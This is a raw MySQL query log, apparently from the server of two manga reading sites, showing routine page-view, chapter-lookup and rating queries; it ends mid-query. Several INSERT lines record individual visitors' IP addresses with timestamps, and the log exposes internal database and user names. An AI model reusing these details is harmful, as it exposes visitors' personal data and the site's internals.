OR genres like '%Manhwa/Manhua%') ORDER BY RAND() limit 10 330651186 Quit 330651187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651188 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651187 Quit 330651188 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651188 Quit 330651189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651190 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651189 Quit 330651190 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651190 Quit 330651191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651191 Quit 330651192 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651192 Quit 330651193 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651194 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651193 Quit 330651194 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651194 Quit 260225 19:29:08 330651195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651196 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651195 Quit 330651196 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11756' and m.active = 1 330651196 Quit 330651197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651197 Query select * FROM chapters where id = '11756' 330651197 Quit 330651198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651198 Query select * FROM chapters where manga_id = '242' order by display_priority ASC, id desc 330651198 Quit 330651199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651199 Query Update chapters set view=view+1 where id = '11756' 330651199 Quit 330651200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651200 Query select * FROM chapters where id = '11756' 330651200 Quit 330651201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651201 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11756' and m.active = 1 330651201 Quit 330651202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651202 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('242', '11756', '17.246.15.231', 'mangaberri.com', '2026-02-26 03:29:08', '2026-02-26 03:29:08') 330651202 Quit 330651203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651203 Query select * FROM chapter_images where chapter_id = '11756' 330651203 Quit 330651204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651204 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '242' and m.active = 1 330651204 Quit 330651205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651205 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='242' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Demons%' OR genres like '%Fantasy%' OR genres like '%Isekai%' OR genres like '%Magic%' OR genres like '%Supernatural%' OR genres like '%Vampire%') ORDER BY RAND() limit 10 330651205 Quit 330651206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651207 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651207 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651206 Quit 330651207 Quit 330651208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651209 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651208 Quit 330651209 Quit 330651210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651210 Quit 330651211 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651211 Quit 330651212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651212 Quit 330651213 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651213 Quit 260225 19:29:09 330651214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651214 Quit 330651215 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5891' 330651215 Quit 330651216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651216 Query select * FROM chapters where id = '5891' 330651216 Quit 330651217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651217 Query select * FROM chapters where manga_id = '111' order by id desc 330651217 Quit 330651218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651218 Query Update chapters set view=view+1 where id = '5891' 330651218 Quit 330651219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651219 Query select * FROM chapters where id = '5891' 330651220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651219 Quit 330651220 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5891' 330651220 Quit 330651221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651221 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('111', '5891', '2804:14d:4ca6:834e:efb5:5349:c4c5:c6c2', 'mangacherri.com', '2026-02-26 03:29:09', '2026-02-26 03:29:09') 330651221 Quit 330651222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651222 Query select * FROM chapter_images where chapter_id = '5891' 330651222 Quit 330651223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651223 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '111' and m.active = 1 330651223 Quit 330651224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651224 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='111' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330651224 Quit 330651225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651225 Quit 330651226 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651226 Quit 330651227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651227 Quit 330651228 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651228 Quit 330651229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651229 Quit 330651230 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651230 Quit 330651231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651231 Quit 330651232 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651232 Quit 260225 19:29:11 330651233 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651234 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651233 Quit 330651234 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5474' and m.active = 1 330651234 Quit 330651235 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651235 Query select * FROM chapters where id = '5474' 330651235 Quit 330651236 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651236 Query select * FROM chapters where manga_id = '149' order by display_priority ASC, id desc 330651236 Quit 330651237 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651237 Query Update chapters set view=view+1 where id = '5474' 330651237 Quit 330651238 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651238 Query select * FROM chapters where id = '5474' 330651239 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651238 Quit 330651239 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5474' and m.active = 1 330651239 Quit 330651240 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651240 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('149', '5474', '204.137.100.1', 'mangaberri.com', '2026-02-26 03:29:11', '2026-02-26 03:29:11') 330651240 Quit 330651241 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651241 Query select * FROM chapter_images where chapter_id = '5474' 330651241 Quit 330651242 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651242 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '149' and m.active = 1 330651242 Quit 330651243 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651243 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='149' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Drama%' OR genres like '%Horror%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%Sci-Fi%') ORDER BY RAND() limit 10 330651243 Quit 330651244 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651244 Quit 330651245 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651245 Quit 330651246 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651246 Quit 330651247 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651247 Quit 330651248 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651249 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651248 Quit 330651249 Quit 330651250 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651250 Quit 330651251 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651251 Quit 330651252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651252 Quit 330651253 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'tonari-no-seki-no-yankee-shimizu-san-ga-kami-o-kuroku-sometekita' 330651253 Quit 330651254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651254 Query select * FROM chapters where manga_id = '67' order by id desc 330651254 Quit 330651255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651255 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '67' and m.active = 1 330651255 Quit 330651256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651256 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='67' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:12 330651256 Quit 330651257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651257 Query select * FROM comments where manga_id = '67' and parent_id is null order by created desc 330651257 Quit 330651258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651258 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '67' and m.active = 1 330651258 Quit 330651259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651259 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Comedy%' OR m.genres like '%Drama%' OR m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Shounen%' OR m.genres like '%Slice of Life%') group by manga_id ORDER BY sum(view) DESC 330651259 Quit 330651260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651260 Quit 330651261 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651261 Quit 330651262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330651262 Quit 330651263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651263 Query select * FROM chapters where manga_id = '67' order by created desc limit 1 330651263 Quit 330651264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651264 Query select * FROM comments where parent_id = '755' 330651264 Quit 330651265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330651265 Quit 330651266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330651266 Quit 330651267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330651267 Quit 330651268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330651268 Quit 330651269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330651269 Quit 330651270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330651270 Quit 330651271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330651271 Quit 330651272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330651272 Quit 330651273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330651273 Quit 330651274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330651274 Quit 330651275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330651275 Quit 330651276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330651276 Quit 330651277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330651277 Quit 330651278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330651278 Quit 330651279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330651279 Quit 330651280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330651280 Quit 330651281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330651281 Quit 330651282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330651282 Quit 330651283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330651283 Quit 330651284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330651284 Quit 330651285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330651285 Quit 330651286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330651286 Quit 330651287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330651287 Quit 330651288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330651288 Quit 330651289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330651289 Quit 330651290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330651290 Quit 330651291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330651291 Quit 330651292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330651292 Quit 330651293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330651293 Quit 330651294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330651294 Quit 330651295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330651295 Quit 330651296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330651296 Quit 330651297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330651297 Quit 330651298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330651298 Quit 330651299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330651299 Quit 330651300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330651300 Quit 330651301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330651301 Quit 330651302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330651302 Quit 330651303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330651303 Quit 330651304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330651304 Quit 330651305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330651305 Quit 330651306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330651306 Quit 330651307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330651307 Quit 330651308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330651308 Quit 330651309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330651309 Quit 330651310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330651310 Quit 330651311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330651311 Quit 330651312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330651312 Quit 330651313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330651313 Quit 330651314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330651314 Quit 330651315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330651315 Quit 330651316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330651316 Quit 330651317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330651317 Quit 330651318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330651318 Quit 330651319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330651319 Quit 330651320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330651320 Quit 330651321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330651321 Quit 330651322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330651322 Quit 330651323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330651323 Quit 330651324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330651324 Quit 330651325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330651325 Quit 330651326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330651326 Quit 330651327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330651327 Quit 330651328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330651328 Quit 330651329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330651329 Quit 330651330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330651330 Quit 330651331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330651331 Quit 330651332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330651332 Quit 330651333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330651333 Quit 330651334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330651334 Quit 330651335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330651335 Quit 330651336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330651336 Quit 330651337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330651337 Quit 330651338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651338 Query select count(id) as 